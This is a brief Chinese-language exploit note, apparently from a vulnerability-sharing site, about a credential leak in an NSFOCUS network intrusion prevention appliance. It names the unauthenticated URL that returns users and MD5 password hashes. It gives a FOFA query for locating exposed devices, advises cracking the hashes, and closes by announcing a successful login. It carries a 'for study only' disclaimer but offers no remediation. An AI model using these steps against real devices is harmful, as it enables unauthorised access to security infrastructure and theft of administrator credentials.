NIPS绿盟网络入侵防护系统users.json敏感信息泄漏

仅供学习交流切勿用于非法用途，否则后果自负！！！

一、漏洞描述

绿盟网络入侵防护系统某版本存在敏感信息泄露漏洞，通过访问https://ip/api/config/users.json，即可获取NIPS的用户名及密码等信息，密码是MD5密文，可以MD5撞库。

二、测产测绘

fofa搜索
title="NSFOCUS NIDPS"

三、漏洞利用

访问https://ip/api/config/users.json

四、输入让你无语的MD5

登录成功！！！